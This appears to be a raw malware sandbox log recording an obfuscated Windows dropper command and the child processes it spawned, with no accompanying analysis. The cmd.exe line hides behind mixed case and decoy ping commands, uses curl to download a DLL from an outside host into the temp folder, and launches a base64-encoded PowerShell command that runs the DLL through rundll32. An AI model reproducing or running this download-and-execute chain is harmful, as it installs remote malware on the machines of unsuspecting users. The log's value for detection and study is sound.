cmd.exe "C:\Windows\System32\cmd.exe" /c 79g59 || sl6TFDg || PIng -n 2 qfBt8 || PIng ApaAk || eCHo 1x48 & cUrL https://smithroses.com/wcnMU8/Uncop -o %TmP%\sheikhZythum.dll & PIng -n 2 ApaAk || eCHo sheikhZythum & pOweRshElL -encodedcommand cgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABzAGgAZQBpAGsAaABaAHkAdABoAHUAbQAuAGQAbABsACwAIABUAGgAcgBvAHcA & Exit
2696PING.EXE PIng -n 2 qfBt8
2788PING.EXE PIng ApaAk
2852curl.exe cUrL https://smithroses.com/wcnMU8/Uncop -o C:\Users\test22\AppData\Local\Temp\sheikhZythum.dll
2900PING.EXE PIng -n 2 ApaAk
2436powershell.exe pOweRshElL -encodedcommand cgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABzAGgAZQBpAGsAaABaAHkAdABoAHUAbQAuAGQAbABsACwAIABUAGgAcgBvAHcA
2604rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\sheikhZythum.dll Throw
1080